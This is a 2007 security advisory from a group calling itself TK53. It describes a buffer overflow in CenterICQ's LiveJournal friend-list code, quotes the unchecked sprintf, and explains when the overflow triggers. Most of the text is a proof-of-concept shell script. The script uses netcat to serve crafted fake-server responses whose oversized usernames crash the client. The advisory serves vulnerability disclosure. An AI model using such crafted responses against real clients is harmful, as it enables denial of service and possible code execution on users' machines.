<br>========================================================================<br><br> TK53 Advisory #1 01/07/2007<br><br> - CenterICQ remote DoS buffer overflow in LiveJournal handling<br><br>========================================================================
<br><br>* Authors: Lolek of TK53 <<a href="mailto:lolek1337@gmail.com">lolek1337@gmail.com</a>>, Roflek of TK53 <<a href="mailto:roflek1337@gmail.com">roflek1337@gmail.com</a>><br><br>* Affected program: CenterICQ (
<a href="http://thekonst.net/centericq/">http://thekonst.net/centericq/</a>)<br><br>* Affected versions: 4.9.11 - 4.21.0<br><br>* Overwiew:<br> CenterICQ contains support for LiveJournal (<a href="http://www.livejournal.com/">
http://www.livejournal.com/</a>), <br> such as posting to your own blog, reading other blogs' RSS feeds, and other<br> community-related functions, such as showing whether a user has added or<br> removed your own users to/from the friend list, all via a unified HTTP
<br> interface provided by LiveJournal. The latter functionality is vulnerable <br> to a buffer overflow and possible remote code execution.<br><br>== Vulnerability Details ==<br><br>$SOURCE/src/hooks/ljhook.cc:<br>char buf[512];
<br>...<br> if(find(friendof.begin(), friendof.end(), in->first) == friendof.end()) {<br> friendof.push_back(in->first);<br><br> if(!foempty) {<br> bd = (string) "http://" +
conf.getourid(proto).server + "/users/" + in->first;<br><br> sprintf(buf, _("The user %s (%s) has added you to his/her friend list\n\nJournal address: %s"),<br> in->
first.c_str(), in->second.c_str(), bd.c_str());<br><br> em.store(imnotification(self, buf));<br> }<br> }<br>...<br><br>CenterICQ regularly checks the server for the friends list (#define
<br>PERIOD_FRIENDS 3600, which means that the check is done every 3600 seconds).<br><br>If a user is in the friend list of at least one user, and another user adds the<br>user to his friend list, foempty gets true, and the sprintf is called, leading
<br>to a buffer overflow in buf. The length of the username (in->first) or the<br>realname (in->second) are totally unchecked. This means that this will overflow<br>if: 2*length(username) + length(realname) + length(string literals) >= sizeof(buf)
<br><br>The only reason why this is not exploitable with the official LiveJournal<br>servers is because LiveJournal has a length restriction on both the username (15<br>characters) and the real name (50 characters). But since the server that is used
<br>for communication is configurable within CenterICQ, and since LiveJournal<br>provides its backend under the GPL, the risk for buffer overflow and<br>exploitation does exist.<br><br>== Proof of Concept Exploit ==<br><br>
add the following to your ~/.centericq/conf<br>lj_nick randomname<br>lj_pass randompass<br>lj_server localhost:8000<br>lj_status o<br>lj_importfriends 1<br><br>Start the following shell script, then CenterICQ and be patient because of
<br>PERIOD_FRIENDS (3600 seconds, 1 hour) time (or make it 10 or whatever in the<br>code and recompile).<br><br>The following shell script is a very simple proof-of-concept demonstration of<br>the buffer overflow:<br><br>
--- SNIP ---<br>#!/bin/sh<br><br>cat > req1.txt << __EOF<br>HTTP/1.0 200 OK<br><br>Date: Sat, 06 Jan 2007 11:51:50 GMT<br><br>Server: Apache<br><br>Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/
<br><br>Content-length: 558<br><br>Connection: close<br><br>Content-Type: text/plain<br><br><br><br>friend_1_bg<br>#ffffff<br>friend_1_fg<br>#000000<br>friend_1_name<br>jwz<br>friend_1_user<br>jwz<br>friend_2_bg<br>#ffffff
<br>friend_2_fg<br>#000000<br>friend_2_name<br>LJ Maintenance<br>friend_2_type<br>community<br>friend_2_user<br>lj_maintenance<br>friend_3_bg<br>#ffffff<br>friend_3_fg<br>#000000<br>friend_3_name<br>LJ Spotlight<br>friend_3_type
<br>community<br>friend_3_user<br>lj_spotlight<br>friend_4_bg<br>#ffffff<br>friend_4_fg<br>#000000<br>friend_4_name<br>LiveJournal News<br>friend_4_type<br>news<br>friend_4_user<br>news<br>friend_count<br>4<br>friendof_1_bg
<br>#ffffff<br>friendof_1_fg<br>#000000<br>friendof_1_name<br>roflek<br>friendof_1_user<br>roflek<br>friendof_count<br>1<br>success<br>OK<br>__EOF<br><br>cat > req2.txt << __EOF<br>HTTP/1.0 200 OK<br><br>Date: Sat, 06 Jan 2007 11:51:50 GMT
<br><br>Server: Apache<br><br>Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/<br><br>Content-length: 558<br><br>Connection: close<br><br>Content-Type: text/plain
<br><br><br><br>friend_1_bg<br>#ffffff<br>friend_1_fg<br>#000000<br>friend_1_name<br>jwz<br>friend_1_user<br>jwz<br>friend_2_bg<br>#ffffff<br>friend_2_fg<br>#000000<br>friend_2_name<br>LJ Maintenance<br>friend_2_type<br>community
<br>friend_2_user<br>lj_maintenance<br>friend_3_bg<br>#ffffff<br>friend_3_fg<br>#000000<br>friend_3_name<br>LJ Spotlight<br>friend_3_type<br>community<br>friend_3_user<br>lj_spotlight<br>friend_4_bg<br>#ffffff<br>friend_4_fg
<br>#000000<br>friend_4_name<br>LiveJournal News<br>friend_4_type<br>news<br>friend_4_user<br>news<br>friend_count<br>4<br>friendof_1_bg<br>#ffffff<br>friendof_1_fg<br>#000000<br>friendof_1_name<br>roflek<br>friendof_1_user
<br>roflek<br>friendof_2_bg<br>#ffffff<br>friendof_2_fg<br>#000000<br>friendof_2_name<br>foo<br>friendof_2_user<br>foo<br>friendof_count<br>2<br>success<br>OK<br>__EOF<br><br>cat > req3.txt << __EOF<br>HTTP/1.0 200 OK
<br><br>Date: Sat, 06 Jan 2007 11:51:50 GMT<br><br>Server: Apache<br><br>Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/<br><br>Content-length: 558
<br><br>Connection: close<br><br>Content-Type: text/plain<br><br><br><br>friend_1_bg<br>#ffffff<br>friend_1_fg<br>#000000<br>friend_1_name<br>jwz<br>friend_1_user<br>jwz<br>friend_2_bg<br>#ffffff<br>friend_2_fg<br>#000000
<br>friend_2_name<br>LJ Maintenance<br>friend_2_type<br>community<br>friend_2_user<br>lj_maintenance<br>friend_3_bg<br>#ffffff<br>friend_3_fg<br>#000000<br>friend_3_name<br>LJ Spotlight<br>friend_3_type<br>community<br>friend_3_user
<br>lj_spotlight<br>friend_4_bg<br>#ffffff<br>friend_4_fg<br>#000000<br>friend_4_name<br>LiveJournal News<br>friend_4_type<br>news<br>friend_4_user<br>news<br>friend_count<br>4<br>friendof_1_bg<br>#ffffff<br>friendof_1_fg
<br>#000000<br>friendof_1_name<br>roflek<br>friendof_1_user<br>roflek<br>friendof_2_bg<br>#ffffff<br>friendof_2_fg<br>#000000<br>friendof_2_name<br>lolek<br>friendof_2_user<br>lolek<br>friendof_3_bg<br>#ffffff<br>friendof_3_fg
<br>#000000<br>friendof_3_name<br>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<br>friendof_3_user<br>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<br>friendof_count<br>3<br>success<br>OK<br>__EOF<br><br>netcat -lp 8000 < req1.txt<br>netcat -lp 8000 < req2.txt<br>netcat -lp 8000 < req3.txt<br><br>--- SNIP ---<br><br>